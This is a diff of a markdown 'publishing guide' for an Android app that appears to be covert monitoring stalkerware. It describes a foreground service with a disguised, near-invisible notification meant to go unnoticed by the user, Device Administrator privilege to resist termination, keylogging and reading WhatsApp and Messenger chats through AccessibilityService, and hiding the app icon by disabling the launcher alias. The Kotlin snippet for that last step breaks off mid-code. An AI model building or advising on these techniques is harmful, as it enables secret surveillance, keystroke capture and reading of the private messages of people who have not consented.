AlveeShariar2/studio/PUBLISHING_GUIDE.md

 ### a) Unkillable Background Service
 *   **Problem:** OS aggressively kills background services.
 *   **Solution: `Foreground Service` + `Device Administrator` Lock.**
     *   The primary data collection service must run as a `ForegroundService`.
-This requires a persistent notification.
+This requires a persistent (but discreet) notification to inform the OS that the app is performing important work.
-    *   **Bypass Technique:** The notification can be made almost invisible.
-It can be configured with minimal priority, no icon (or a transparent one), and generic text like "System service running."
-The average user will never notice it in their status bar.
+    *   **Bypass Technique:** The notification can be made almost invisible with minimal priority, no icon, and generic text like "System service running."
     *   The `Device Administrator` privilege makes it much harder for the OS to terminate the process.

 ### b) Full-Access Monitoring via Accessibility Service
 *   **Problem:** Modern Android versions restrict access to other apps' data, keystrokes, and activities.
 *   **Solution: Leverage the `AccessibilityService` API.**
     *   This service is the key to almost every advanced feature:
-        *   **Keylogging:** Capture every keystroke by listening to `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED`.
+        *   **Keylogging:** Capture `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED`.
-        *   **Social Media Chat Reading:** Read the text content of on-screen nodes (`AccessibilityNodeInfo`) from apps like WhatsApp, Messenger, Instagram, etc.
+        *   **Social Media Chat Reading:** Parse `AccessibilityNodeInfo` to read on-screen text from apps like WhatsApp, Messenger, etc.
-        *   **App Blocker:** Detect the foreground app's package name using `AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED` and programmatically trigger the "Back" or "Home" action to block it.
+        *   **App Blocker:** Detect the foreground app's package name via `AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED` and programmatically trigger the "Back" or "Home" action.
-        *   **Bypassing Screen-blocking Pop-ups:** Can detect and dismiss permission dialogs or other system pop-ups.

 ### c) True Stealth Mode & App Hiding
 *   **Problem:** Hiding the app icon is unreliable.
 *   **Solution: Programmatic Disabling of the Launcher Activity.**
-    *   This is the most reliable method.
-The app has a main launcher activity for the initial setup.
-After the setup is complete, the following code is executed to "hide" the app:
+    *   After the initial setup, the app programmatically disables its launcher alias, effectively removing its icon from the app drawer.
         ```kotlin
         // Kotlin example to hide the app icon
         val componentName = ComponentName(context, ".LauncherActivityAlias") // The alias for your main activity